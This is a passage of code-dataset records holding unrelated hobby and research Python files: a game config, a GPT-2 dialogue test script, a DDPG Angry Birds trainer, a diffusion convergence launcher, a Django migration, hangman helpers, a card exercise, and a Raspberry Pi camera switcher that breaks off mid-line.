+{"seq_id":"359186071","text":"VERSION = \"1.0.0\"\n\n\"\"\" Hämta skärmupplösning \"\"\"\nimport tkinter\nscreen = tkinter.Tk()\nscreen.withdraw()\nSCREEN_WIDTH = screen.winfo_screenwidth()\nSCREEN_HEIGHT = screen.winfo_screenheight()\nFULLSCREEN = True\nDIAGNOSE_FISH = False\nSKIP_MAIN_MENU = False\nSPLASH_IMAGE = \"assets/images/splash/splash.png\"\n\n\"\"\" Bakgrundsbild \"\"\"\nBACKGROUND_IMAGE = \"assets/images/background.jpg\"\nSAND_RATIO = 0.2 # Andel av skärmen täckt av sandbotten\n\nTICK_RATE = 60\n\n\"\"\" Egenskaper för morötterna \"\"\"\nSPRITE_SCALING_CARROT = 0.25\ncarrot_food_value = 1000\ncarrot_frequency = 1\n\n\"\"\" Egenskaper för kroken \"\"\"\nSPRITE_SCALING_FISH_HOOK = 0.15\n\n\"\"\" Egenskaper för popcorn \"\"\"\nSPRITE_SCALING_POPCORN = 0.05\npopcorn_food_value = 500\n\n\"\"\" Egenskaper för blåbär \"\"\"\nSPRITE_SCALING_BLUEBERRY = 0.2\nblueberry_food_value = 500\n\n\"\"\" Egenskaper för blåbärsplantan \"\"\"\nPLANT_BLUEBERRY_NUMBER = 5\nSPRITE_SCALING_PLANT_BLUEBERRY = 0.1\nplant_blueberry_grow_rate = 1\n\n\"\"\" Egenskaper för förgrundsplantan \"\"\"\nPLANT_FOREGROUND_NUMBER = 5\nSPRITE_SCALING_PLANT_FOREGROUND = 0.6\n\n\"\"\" Egenskaper för fiskägg \"\"\"\nSCALING_FISH_EGG = 0.15\nfish_egg_hatch_age = 1000\nfish_egg_disapear_age = 1500\n\n\"\"\" Egenskaper för bubbelkartor \"\"\"\nBUBBLE_MAPS = 5 # Antalet bubbelkartor att generera\n\n\"\"\" Egenskaper för muspekaren \"\"\"\nSCALING_POINTER = 0.08\n\n\"\"\"\nImportera debug1.py om den existerar\nFilen spåras inte av repo utan är lokal\nHa kvar längst ner, ifall den skriver över några vars\n\"\"\"\ntry:\n from debug import *\n DEBUG = True\nexcept:\n DEBUG = False\n","sub_path":"vars.py","file_name":"vars.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"348394314","text":"import transformers\nimport torch\nimport os\nimport json\nimport random\nimport numpy as np\nimport argparse\nfrom datetime import datetime\nfrom tqdm import tqdm\nfrom torch.nn import DataParallel\nimport logging\nfrom transformers.modeling_gpt2 import GPT2Config, GPT2LMHeadModel\nfrom transformers import BertTokenizer\nfrom os.path import join, exists\nfrom itertools import zip_longest, chain\n# from chatbot.model import DialogueGPT2Model\nfrom dataset import MyDataset\nfrom torch.utils.data import Dataset, DataLoader\nfrom torch.nn import CrossEntropyLoss\nfrom sklearn.model_selection import train_test_split\nfrom train import create_model\nimport torch.nn.functional as F\nimport codecs\nimport json\nPAD = '[PAD]'\npad_id = 0\n\nPAD = '[PAD]'\npad_id = 0\nlogger = None\nname_map_aspect = {\"电影名\": \"moviename\",\"导演\": \"director\",\"演员名\":\"actor\", \"类型\":\"movie_type\" ,\"国家\":\"country\" ,\"上映时间\":\"time\" , \"角色\":\"role\",\"剧情\":\"plot\",\"台词\":\"lines\",\"奖项\":\"award\" ,\n \"票房\":\"income\",\"评分\":\"rating\",\"资源\":\"website\", \"音乐\":\"music\", \"其他\":\"aspect_others\"}\nname_map_action ={\"请求事实\":\"request_fact\", \"请求推荐\":\"request_rec\",\"请求感受\":\"request_feeling\",\"告知事实\":\"inform_fact\",\"告知推荐\":\"inform_rec\",\"告知感受\":\"inform_feeling\",\"其他\":\"others\"}\n\nSPECIAL_TOKENS = {\n\"start_context\" : \"[context]\",\n\"end_context\" : \"[endofcontext]\",\n\"start_action\" : \"[action]\",\n\"end_action\" : \"[endofaction]\",\n\"start_know\": \"[knowledge]\",\n\"end_know\": \"[endofknowledge]\",\n\"start_response\":\"[response]\",\n\"end_response\":\"[endofresponse]\",\n\"user\":\"[user]\",\n\"system\": \"[system]\",\n}\nroot=\"/apdcephfs/share_47076/aaronsu/GPT2-movie-chat-0715-01/\"\n\ndef setup_train_args():\n \"\"\"\n 设置训练参数\n \"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument('--device', default='0,1,2,3', type=str, required=False, help='设置使用哪些显卡')\n parser.add_argument('--no_cuda', action='store_true', help='不使用GPU进行训练')\n parser.add_argument('--model_config', default=root+'config/model_config_dialogue_small.json', type=str, required=False,\n help='选择模型参数')\n parser.add_argument('--vocab_path', default=root+'vocabulary/vocab_small.txt', type=str, required=False, help='选择词库')\n parser.add_argument('--train_raw_path', default=root+'new_data/train.txt', type=str, required=False, help='原始训练语料')\n parser.add_argument('--valid_tokenized_path', default=root+'movie_data/valid_tokenized.txt', type=str,\n required=False,\n help='将原始训练预料tokenize之后的数据的存放位置')\n parser.add_argument('--log_path', default=root+'test.log', type=str, required=False, help='训练日志存放位置')\n parser.add_argument('--raw', action='store_true', help='是否对原始训练语料做tokenize。若尚未对原始训练语料进行tokenize,则指定该参数')\n parser.add_argument('--epochs', default=10, type=int, required=False, help='训练的轮次')\n parser.add_argument('--batch_size', default=8, type=int, required=False, help='训练batch size')\n parser.add_argument('--lr', default=1e-5, type=float, required=False, help='学习率')\n parser.add_argument('--warmup_steps', default=20000, type=int, required=False, help='warm up步数')\n parser.add_argument('--log_step', default=100, type=int, required=False, help='多少步汇报一次loss')\n parser.add_argument('--gradient_accumulation', default=1, type=int, required=False, help='梯度积累')\n parser.add_argument('--max_grad_norm', default=1.0, type=float, required=False)\n parser.add_argument('--model_path', default=root+ 'ul_model_best/model_epoch10/pytorch_model.bin', type=str, required=False, 
help='预训练的GPT2模型的路径')\n parser.add_argument('--writer_dir', default=root+'tensorboard_summary/', type=str, required=False, help='Tensorboard路径')\n parser.add_argument('--seed', type=int, default=None, help='设置种子用于生成随机数,以使得训练的结果是确定的')\n parser.add_argument('--num_workers', type=int, default=1, help=\"dataloader加载数据时使用的线程数量\")\n # parser.add_argument('--max_len', type=int, default=60, help='每个utterance的最大长度,超过指定长度则进行截断')\n # parser.add_argument('--max_history_len', type=int, default=4, help=\"dialogue history的最大长度\")\n parser.add_argument('--temperature', default=1, type=float, required=False, help='生成的temperature')\n parser.add_argument('--topk', default=8, type=int, required=False, help='最高k选1')\n parser.add_argument('--topp', default=0, type=float, required=False, help='最高积累概率')\n parser.add_argument('--repetition_penalty', default=1.3, type=float, required=False,\n help=\"重复惩罚参数,若生成的对话重复性较高,可适当提高该参数\")\n parser.add_argument('--max_len', type=int, default=50, help='每个utterance的最大长度,超过指定长度则进行截断')\n parser.add_argument('--max_history_len', type=int, default=5, help=\"dialogue history的最大长度\")\n return parser.parse_args()\n\n\n\n\n\n\ndef create_logger(args):\n \"\"\"\n 将日志输出到日志文件和控制台\n \"\"\"\n logger = logging.getLogger(__name__)\n logger.setLevel(logging.INFO)\n\n formatter = logging.Formatter(\n '%(asctime)s - %(levelname)s - %(message)s')\n\n # 创建一个handler,用于写入日志文件\n file_handler = logging.FileHandler(\n filename=args.log_path)\n file_handler.setFormatter(formatter)\n file_handler.setLevel(logging.INFO)\n logger.addHandler(file_handler)\n\n # 创建一个handler,用于将日志输出到控制台\n console = logging.StreamHandler()\n console.setLevel(logging.DEBUG)\n console.setFormatter(formatter)\n logger.addHandler(console)\n\n return logger\n\n\ndef top_k_top_p_filtering(logits, top_k=0, top_p=0.0, filter_value=-float('Inf')):\n \"\"\" Filter a distribution of logits using top-k and/or nucleus (top-p) filtering\n Args:\n logits: logits distribution shape (vocabulary size)\n top_k > 0: keep only top k tokens with highest probability (top-k filtering).\n top_p > 0.0: keep the top tokens with cumulative probability >= top_p (nucleus filtering).\n Nucleus filtering is described in Holtzman et al. 
(http://arxiv.org/abs/1904.09751)\n From: https://gist.github.com/thomwolf/1a5a29f6962089e871b94cbd09daf317\n \"\"\"\n assert logits.dim() == 1 # batch size 1 for now - could be updated for more but the code would be less clear\n top_k = min(top_k, logits.size(-1)) # Safety check\n if top_k > 0:\n # Remove all tokens with a probability less than the last token of the top-k\n # torch.topk()返回最后一维最大的top_k个元素,返回值为二维(values,indices)\n # ...表示其他维度由计算机自行推断\n indices_to_remove = logits < torch.topk(logits, top_k)[0][..., -1, None]\n logits[indices_to_remove] = filter_value # 对于topk之外的其他元素的logits值设为负无穷\n\n if top_p > 0.0:\n sorted_logits, sorted_indices = torch.sort(logits, descending=True) # 对logits进行递减排序\n cumulative_probs = torch.cumsum(F.softmax(sorted_logits, dim=-1), dim=-1)\n\n # Remove tokens with cumulative probability above the threshold\n sorted_indices_to_remove = cumulative_probs > top_p\n # Shift the indices to the right to keep also the first token above the threshold\n sorted_indices_to_remove[..., 1:] = sorted_indices_to_remove[..., :-1].clone()\n sorted_indices_to_remove[..., 0] = 0\n\n indices_to_remove = sorted_indices[sorted_indices_to_remove]\n logits[indices_to_remove] = filter_value\n return logits\n\n\ndef main():\n args = setup_train_args()\n logger = create_logger(args)\n # 当用户使用GPU,并且GPU可用时\n args.cuda = torch.cuda.is_available() and not args.no_cuda\n device = 'cuda' if args.cuda else 'cpu'\n logger.info('using device:{}'.format(device))\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = args.device\n tokenizer = BertTokenizer(vocab_file=args.vocab_path)\n tokenizer.add_tokens([i for i in SPECIAL_TOKENS.values()])\n tokenizer.add_tokens([i for i in name_map_aspect.values()])\n tokenizer.add_tokens([i for i in name_map_action.values()])\n \n config = GPT2Config.from_pretrained(root+ \"ul_model_best/model_epoch8/config.json\")\n\n model = GPT2LMHeadModel.from_pretrained(args.model_path, config=config)\n model.to(device)\n model.eval()\n # print('开始和chatbot聊天,输入CTRL + Z以退出')\n response = []\n with open(args.valid_tokenized_path, \"r\", encoding=\"utf8\") as f:\n data = f.read()\n data_list = data.split(\"\\n\")\n train_list, test_list = train_test_split(data_list, test_size=0.2, random_state=1) \n test_dataset = MyDataset(test_list)\n with codecs.open(root+\"cxt_response.txt\", \"w\", \"utf-8\") as fout:\n \tfor test_i in test_list[:500]:\n input_ids = [int(token_id) for token_id in test_i.split(\"13323\")[0].split()] \n # 13323 is startofresponse, 13324 is endofresponse\n if len(input_ids) > 200: \n continue\n curr_input_tensor = torch.tensor(input_ids).long().to(device)\n generated = []\n # 最多生成max_len个token\n for _ in range(args.max_len):\n outputs = model(input_ids=curr_input_tensor)\n next_token_logits = outputs[0][-1, :]\n # 对于已生成的结果generated中的每个token添加一个重复惩罚项,降低其生成概率\n for id in set(generated):\n next_token_logits[id] /= args.repetition_penalty\n next_token_logits = next_token_logits / args.temperature\n # 对于[UNK]的概率设为无穷小,也就是说模型的预测结果不可能是[UNK]这个token\n next_token_logits[tokenizer.convert_tokens_to_ids('[UNK]')] = -float('Inf')\n filtered_logits = top_k_top_p_filtering(next_token_logits, top_k=6, top_p=0)\n # torch.multinomial表示从候选集合中无放回地进行抽取num_samples个元素,权重越高,抽到的几率越高,返回元素的下标\n next_token = torch.multinomial(F.softmax(filtered_logits, dim=-1), num_samples=1)\n if next_token == 13324: # 遇到[SEP]则表明response生成结束\n break\n generated.append(next_token.item())\n curr_input_tensor = torch.cat((curr_input_tensor, next_token), dim=0)\n # his_text = 
tokenizer.convert_ids_to_tokens(curr_input_tensor.tolist())\n # print(\"his_text:{}\".format(his_text))\n text = tokenizer.convert_ids_to_tokens(generated)\n context = tokenizer.convert_ids_to_tokens(input_ids)\n golden = tokenizer.convert_ids_to_tokens([int(token_id) for token_id in test_i.split(\"13323\")[1].split()])\n fout.write(\"\".join(context)+\"\\n\")\n fout.write(\"\".join(golden)+\"\\n\")\n fout.write(\"\".join(text)+\"\\n\\n\")\n \n\n\nif __name__ == '__main__':\n main()\n","sub_path":"k_cxt_test.py","file_name":"k_cxt_test.py","file_ext":"py","file_size_in_byte":11353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"480533957","text":"\n\n#calss header\nclass _PERHAPS():\n\tdef __init__(self,): \n\t\tself.name = \"PERHAPS\"\n\t\tself.definitions = [u'used to show that something is possible or that you are not certain about something: ', u'used to show that a number or amount is approximate: ', u'used when making polite requests or statements of opinion: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'adverbs'\n\n\n\tdef run(self, obj1, obj2):\n\t\tself.jsondata[obj2] = {}\n\t\tself.jsondata[obj2]['properties'] = self.name.lower()\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/adverbs/_perhaps.py","file_name":"_perhaps.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"477387053","text":"#!/usr/bin/env python3\nimport numpy as np\nimport random\nimport argparse\nfrom keras.models import model_from_json, Model\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense, Dropout, Activation, Flatten\nfrom keras.optimizers import Adam\nimport tensorflow as tf\nimport json\n\nfrom ReplayBuffer import ReplayBuffer\nfrom ActorNetwork import ActorNetwork\nfrom CriticNetwork import CriticNetwork\nfrom OU import OU\nimport ABPipe\nimport timeit\n\nOU = OU() # Ornstein-Uhlenbeck Process\n\n\ndef playGame(train_indicator=1, runGame=1, resume=True, client_number=1): # 1 means Train, 0 means simply Run\n BUFFER_SIZE = 10000\n BATCH_SIZE = 8\n GAMMA = 0.8\n TAU = 0.01 # Target Network HyperParameters\n LRA = 1e-6 # Learning rate for Actor\n LRC = 1e-5 # Lerning rate for Critic\n\n action_dim = 2 # X, Y cordinate\n state_dim = 2000 # The encoding length of the game state\n\n np.random.seed(993)\n\n EXPLORE = 1000.\n training_steps = 1000\n reward = 0\n done = False\n step = 0\n epsilon = 1\n noise = 50\n\n # Tensorflow GPU optimization\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n sess = tf.Session(config=config)\n\n from keras import backend as K\n K.set_session(sess)\n\n actor = ActorNetwork(sess, state_dim, action_dim, BATCH_SIZE, TAU, LRA)\n critic = CriticNetwork(sess, state_dim, action_dim, BATCH_SIZE, TAU, LRC)\n buff = ReplayBuffer(BUFFER_SIZE) # Create replay buffer\n\n def getAction(s_t, train_indicator):\n global epsilon\n epsilon -= 1.0 / EXPLORE\n a_t = np.zeros([1, action_dim])\n noise_t = np.zeros([1, action_dim])\n\n a_t_original = actor.model.predict(s_t)\n print('Original Shift: ', a_t_original)\n\n # noise_t[0][0] = train_indicator * max(epsilon, 0) * OU.function(a_t_original[0][0], 600, 0.5, 75)\n # noise_t[0][1] = train_indicator * max(epsilon, 0) * OU.function(a_t_original[0][1], 300, 0.5, 75)\n\n noise_t[0][0] = train_indicator * max(epsilon, 0) * np.random.randn(1)[0] * noise\n noise_t[0][1] = train_indicator * max(epsilon, 0) * np.random.randn(1)[0] * noise\n\n # in case the noise is too big\n if abs(noise_t[0][0]) > 2 * noise:\n noise_t[0][0] = 0\n if abs(noise_t[0][1]) > 2 * noise:\n noise_t[0][1] = 0\n\n print('Noise: ', noise_t[0])\n\n a_t[0][0] = a_t_original[0][0] + noise_t[0][0]\n a_t[0][1] = a_t_original[0][1] + noise_t[0][1]\n\n \"\"\"\n Send the target point and wait for the agent to execute the action\n \"\"\"\n target_point_x = int(a_t[0][0])\n target_point_y = int(a_t[0][1])\n target_point_str = str(target_point_x) + ',' + str(target_point_y)\n print('Action: ', target_point_str)\n return target_point_str\n\n # Now load the weight\n if resume:\n actor.model.load_weights(\"actormodel.h5\")\n critic.model.load_weights(\"criticmodel.h5\")\n actor.target_model.load_weights(\"actormodel.h5\")\n critic.target_model.load_weights(\"criticmodel.h5\")\n print(\"Weight load successfully\")\n\n if runGame:\n for i in range(training_steps):\n \"\"\"\n Receive `prevState`, the extracted feature before shoot\n \"\"\"\n # Receive state from different pipes here\n\n for agent_id in range(client_number):\n data = ABPipe.read_shoot(pipe_id=agent_id)\n s_t = np.array(data.split(',')[0:-1], dtype=float).reshape(1, 2000)\n\n target_point_str = getAction(s_t, train_indicator)\n\n # abPipe.writeShoot(target_point_str)\n ABPipe.write_shoot(string=target_point_str, pipe_id=agent_id)\n\n # this is for one pipe. 
repeat for eight times\n\n \"\"\"\n Receive bufferGroup after one episode\n \"\"\"\n for agent_id in range(client_number):\n buffer_group_str = ABPipe.read_buffers(pipe_id=agent_id)\n buff.append_from_buffer_group_string(buffer_group_str)\n\n # after receiving bufferGroup, no matter there is buffer, we start training once\n\n print('Buffer size is: ', buff.count())\n \"\"\"\n buff.add(s_t, a_t, r_t, s_t1, done)\n Add replay buffer\n Format: buff.add((np.ones(500), (300,300), 10000, np.ones(500), False))\n Do the batch update\n \"\"\"\n if train_indicator and buff.count() != 0:\n batch = buff.getBatch(BATCH_SIZE)\n states = np.asarray([e[0] for e in batch])\n actions = np.asarray([e[1] for e in batch])\n rewards = np.asarray([e[2] for e in batch])\n new_states = np.asarray([e[3] for e in batch])\n dones = np.asarray([e[4] for e in batch])\n y_t = np.asarray([e[1] for e in batch])\n\n target_q_values = critic.target_model.predict([new_states, actor.target_model.predict(new_states)])\n\n for k in range(len(batch)):\n if dones[k]:\n y_t[k] = rewards[k]\n else:\n y_t[k] = rewards[k] + GAMMA * target_q_values[k]\n\n # print('Batch: ', batch)\n loss = critic.model.train_on_batch([states, actions], y_t)\n a_for_grad = actor.model.predict(states)\n grads = critic.gradients(states, a_for_grad)\n actor.train(states, grads)\n actor.target_train()\n critic.target_train()\n\n if np.mod(i, 10) == 0:\n print(\"Now we save model\")\n actor.model.save_weights(\"actormodel.h5\", overwrite=True)\n with open(\"actormodel.json\", \"w\") as outfile:\n json.dump(actor.model.to_json(), outfile)\n\n critic.model.save_weights(\"criticmodel.h5\", overwrite=True)\n with open(\"criticmodel.json\", \"w\") as outfile:\n json.dump(critic.model.to_json(), outfile)\n\n np.save('buffer.npy', buff.buffer)\n\n\nif __name__ == \"__main__\":\n playGame(train_indicator=1, runGame=1, resume=False, client_number=4)\n","sub_path":"OldBird.py","file_name":"OldBird.py","file_ext":"py","file_size_in_byte":6242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"538600067","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Feb 13 16:18:17 2018\r\n\r\n@author: Jeremy\r\n\"\"\"\r\n\r\nimport main_diffusion_rk as main\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\nstore_dt = np.zeros((4,5))\r\nfor i in range(1,5):\r\n for k in range(1,6):\r\n dt = 0.025\r\n delta_t = 0.05\r\n error_L2 = 0\r\n while (error_L2 < 200):\r\n ###############################################################################\r\n # INPUTS #\r\n ###############################################################################\r\n scheme = k #version 1 sun, version 2 IP, version 3 LDG, version 4 BR2, version 5 Gassner\r\n D = 1 #diffusion coefficient\r\n delta_t = delta_t + dt #time step parameter\r\n n_cells = 49 #number of cells in the mesh\r\n x_min = 0 #left coordinate of the physical domain\r\n x_max = 50 #right coordinate of the physical domain\r\n order_of_accuracy = i #order of accuracy of the solution\r\n # (number of solution points = order_of_accuracy)\r\n n_time_step = 30 #number of steps calculated\r\n dirichlet = 0; #dirichlet = 0, no dirichlet condition, 1 dirichlet condition (1 at right border)\r\n \r\n initial_choice = 0 #initialization 0 gaussian, 1 dirichlet, 2 stationary\r\n time_ech = 10 #periode where we compare the solution to the analytique solution\r\n x_coordinates, simulated_time, initial_solution, results, theoretical_values,error_L2 = \\\r\n main.run_main(scheme, D, delta_t, n_cells, x_min, \\\r\n x_max, order_of_accuracy, n_time_step,initial_choice,dirichlet,time_ech)\r\n \r\n if (scheme == 1):\r\n schema = 'Sun'\r\n if (scheme == 2):\r\n schema = 'IP'\r\n if (scheme == 3):\r\n schema = 'LDG'\r\n if (scheme == 4):\r\n schema = 'BR2'\r\n if (scheme == 5):\r\n schema = 'Gassner'\r\n \r\n '''\r\n ###############################################################################\r\n # PLOT THE SOLUTION AT A GIVEN TIME STEP #\r\n ###############################################################################\r\n plt.plot(x_coordinates, initial_solution)\r\n plt.plot(x_coordinates, results)\r\n if (initial_choice == 0 ):\r\n plt.plot(x_coordinates, theoretical_values)\r\n plt.legend(['t = 0', \\\r\n 't =' + str(round(simulated_time, 1)), \\\r\n 'therorical solution at ' + str(round(simulated_time, 1))])\r\n plt.title(schema+', time step = '+str(delta_t)+', degree ='+str(order_of_accuracy)+', error L2 = '+str(error_L2))\r\n else :\r\n plt.legend(['t = 0', \\\r\n 't =' + str(round(simulated_time, 1))])\r\n plt.title(schema+', time step = '+str(delta_t)+', degree ='+str(order_of_accuracy))\r\n ''' \r\n print(error_L2)\r\n \r\n store_dt[i-4,k-1] = delta_t \r\n\r\n","sub_path":"Diffusion/Code complet/sd_launcher_convergence.py","file_name":"sd_launcher_convergence.py","file_ext":"py","file_size_in_byte":3591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"18329229","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/jennyq/.pyenv/versions/venv_t12/lib/python3.7/site-packages/tendenci/apps/memberships/migrations/0006_membershipset_donation_amount.py\n# Compiled at: 2020-03-30 17:48:04\n# Size of source mod 2**32: 425 bytes\nfrom django.db import migrations, models\n\nclass Migration(migrations.Migration):\n dependencies = [\n ('memberships', '0005_auto_20161101_1518')]\n operations = [\n migrations.AddField(model_name='membershipset',\n name='donation_amount',\n field=models.DecimalField(default=0, max_digits=15, decimal_places=2, blank=True))]","sub_path":"pycfiles/tendenci-12.0.3-py3-none-any/0006_membershipset_donation_amount.cpython-37.py","file_name":"0006_membershipset_donation_amount.cpython-37.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"441297662","text":"# -*- coding: utf-8 -*-\n# datos o funciones auxiliares para mantener ordenado nuestro codigo del jugador\n\nimport time\n\n\ndef enviarPalabraParaContrincante(longitud):\n \"\"\"\n Función que, dada la longitud de una palabra, devuelve la palabra pedida al\n usuario que recibe el mensaje.\n\n Parameters\n ----------\n longitud : int\n Longitud de la palabra.\n\n Returns\n -------\n palabra: str\n Palabra escrita por el usuario.\n \"\"\"\n\n time.sleep(1)\n\n while True:\n\n palabra = input('Propón una palabra para tu contrincante de la longitud indicada: ')\n palabra.lower()\n if len(palabra) != longitud:\n print('Por favor, que sea de la longitud indicada.')\n elif not all([char in \"abcdefghijklmnñopqrstuvwxyz\" for char in palabra]):\n print('Por favor, ingresa una PALABRA.')\n else:\n return palabra\n\n\ndef obtenerIntento(letrasProbadas):\n \"\"\"\n Función que, dada una lista de las letras probadas ya, devuelve un intento para \n introducir una letra nueva pedida al usuario.\n\n Parameters\n ----------\n letrasProbadas : list\n Lista de letras ya recibidas por el usuario.\n\n Returns\n -------\n intento : str\n Letra introducida por el usuario.\n \n \"\"\"\n\n while True:\n\n time.sleep(1) \n intento = input('Adivina una de las letras: ')\n intento = intento.lower()\n if len(intento) != 1:\n print('Por favor, introduce UNA letra.')\n elif intento in letrasProbadas:\n print('Ya has probado esa letra. Elige otra.')\n elif intento not in 'abcdefghijklmnñopqrstuvwxyz':\n print('Por favor ingresa una LETRA.')\n else:\n return intento\n","sub_path":"auxiliaresJugador.py","file_name":"auxiliaresJugador.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"227657014","text":"str = input()\npList = []\nkList = []\nhList = []\ntList = []\n\ni = len(str)-1\nwhile i >= 0:\n\tnumber = (int(str[i-1])*10)+(int(str[i]*1))\n\ti = i-3\n\tif str[i+1] == \"P\":\n\t\tpList.append(number)\n\telif str[i+1] == \"K\":\n\t\tkList.append(number)\n\telif str[i+1] == \"H\":\n\t\thList.append(number)\n\telif str[i+1] == \"T\":\n\t\ttList.append(number)\n\n#print(pList); print(kList); print(hList); print(tList)\ndef ele_uniqueness(lis):\n\tcheck = True\n\tif len(lis) < 2:\n\t\treturn check\n\telse:\n\t\tfor j in range(len(lis)):\n\t\t\tfor k in range(j+1, len(lis)):\n\t\t\t\tif(lis[j] == lis[k]):\n\t\t\t\t\tcheck = False\n\treturn check\n\nif ele_uniqueness(pList) and ele_uniqueness(kList) and ele_uniqueness(hList) and ele_uniqueness(tList):\n\tprint(13-len(pList), 13-len(kList), 13-len(hList), 13-len(tList))\n\nelse:\n\tprint(\"GRESKA\")\n\t","sub_path":"karte.py","file_name":"karte.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"163793164","text":"#Programmer: Israel Garcia Figueroa\n#program: operates the camera on with arducam module\n#Team: ROV team\n#---------------------------------------------------\nimport pygame\nimport sys\nimport time \nimport pygame.camera\n\nimport RPi.GPIO as gp\nimport os\n#import xbox\nimport time\nfrom picamera import PiCamera #\n\nimport threading\nclass myThread (threading.Thread):\n def __init__(self, threadID, name, counter):\n threading.Thread.__init__(self)\n self.threadID = threadID\n self.name = name\n self.counter = counter\n def run(self):\n camA = Capture()\n \n camA.main()\n print(\"stopping camera thread\")\n\nclass Capture(object):\n def __init__(self):\n self.size = (1280,720)\n # create a display surface. standard pygame stuff\n self.display = pygame.display.set_mode(self.size, 0)\n\n # this is the same as what we saw before\n self.clist = pygame.camera.list_cameras()\n if not self.clist:\n raise ValueError(\"Sorry, no cameras detected.\")\n self.cam = pygame.camera.Camera(self.clist[0], self.size)\n self.cam.start()\n\n # create a surface to capture to. for performance purposes\n # bit depth is the same as that of the display surface.\n self.snapshot = pygame.surface.Surface(self.size, 0, self.display)\n\n def get_and_flip(self):\n # if you don't want to tie the framerate to the camera, you can check\n # if the camera has an image ready. note that while this works\n # on most cameras, some will never return true.\n if self.cam.query_image():\n self.snapshot = self.cam.get_image(self.snapshot)\n\n # blit it to the display surface. simple!\n self.display.blit(self.snapshot, (0,0))\n pygame.display.flip()\n\n def main(self):\n #pygame.joystick.init()\n going = True\n print(\"starting live feed\")\n time.sleep(2)\n while going:\n #event = pygame.event.get()\n\n for event in pygame.event.get(): # User did something.\n #print(\"in for loop\")\n if (event.type == pygame.QUIT or event.type == pygame.JOYBUTTONDOWN or\n event.type == pygame.KEYDOWN or event.type == pygame.KEYUP):# If user clicked close.\n print(\"closing camera\")\n going = False # Flag that we are done so we exit this loop.\n self.cam.stop()\n if(going):\n self.get_and_flip()\n \n \nos.environ[\"DISPLAY\"]= \":0\" \n# gpio being set up for i2c interface\ngp.setwarnings(False)\ngp.setmode(gp.BOARD)\n\ngp.setup(7, gp.OUT)\ngp.setup(11, gp.OUT)\ngp.setup(12, gp.OUT)\n\ngp.setup(15, gp.OUT)\ngp.setup(16, gp.OUT)\ngp.setup(21, gp.OUT)\ngp.setup(22, gp.OUT)\n\ngp.output(11, True)\ngp.output(12, True)\ngp.output(15, True)\ngp.output(16, True)\ngp.output(21, True)\ngp.output(22, True)\n#end of i2c setup for camera\n\npygame.init()\nWINDOW_HEIGHT = 700\nWINDOW_WIDTH = 500\nscreen = pygame.display.set_mode((WINDOW_WIDTH, WINDOW_HEIGHT))\n\npygame.joystick.init()\npygame.camera.init()\n#joy = xbox.Joystick() # joy object for our xbox 360 camera\n\n\ncamera = 1# O will be cam a and 1 will be cam b\npermit = False #semiphore to prevent setupt on the\ndone = False\n\n#print(threading.enumerate())\nwhile(not done):\n\n for event in pygame.event.get(): # User did something.\n if event.type == pygame.QUIT: # If user clicked close.\n print(\"closing\")\n done = True # Flag that we are done so we exit this loop. 
\n joystick_count = pygame.joystick.get_count()\n for i in range(joystick_count):\n joystick = pygame.joystick.Joystick(i)\n joystick.init()\n\n try:\n jid = joystick.get_instance_id()\n except AttributeError:\n # get_instance_id() is an SDL2 method\n jid = joystick.get_id()\n\n # Get the name from the OS for the controller/joystick.\n name = joystick.get_name()\n #print(name)\n \n\n try:\n guid = joystick.get_guid()\n except AttributeError:\n # get_guid() is an SDL2 method\n pass\n else:\n print(guid)\n buttons = joystick.get_numbuttons()\n for i in range(buttons):\n button = joystick.get_button(i)\n if(button == True and i == 6):\n done = True\n if(button == True and i == 3): # button press: 0 -> false, 1 -> true\n print(\"camera button was pressed\")\n time.sleep(.4) #rebounding on button press\n if camera == 0:\n camera = 1\n permit = True\n #cmd = \"raspistill -t 1\"\n #os.system(cmd)\n\n elif camera ==1:\n camera =0\n permit =True\n #print(\"looping main\")\n\n for event in pygame.event.get():\n if event.type == pygame.KEYDOWN or event.type == pygame.KEYUP:\n if event.key == pygame.K_DOWN:\n print('No modifier keys were in a pressed state when this '\n 'event occurred.')\n print(\"camera button was pressed\")\n time.sleep(.4) #rebounding on button press\n if camera == 0:\n camera = 1\n permit = True\n #cmd = \"raspistill -t 1\"\n #os.system(cmd)\n\n elif camera ==1:\n camera =0\n permit =True\n #print(\"looping main\")\n\n\n\n\n\n\n\n\n\n if permit == True: # condition will check if to change camera\n print(\"changing camera to \")\n if camera == 0 :\n permit = False\n i2c = \"i2cset -y 1 0x70 0x00 0x04 \"\n os.system(i2c)\n gp.output(7, False)\n gp.output(11, False)\n gp.output(12, True)\n print(\"Camera A\")\n\n \n #print(\"starting camera thread.... \")\n #if(threadB.isAlive()):\n # print(\"but camera A on.... \")\n # threadB.join(1)\n # print(\"camera A off \")\n \n #print(threading.enumerate())\n\n threadA = myThread(1,\"Camera A\", 1)\n threadA.start()\n #print(threading.enumerate())\n #cmd = \"raspistill -p 10,10,852,480 -t 1800000 -k 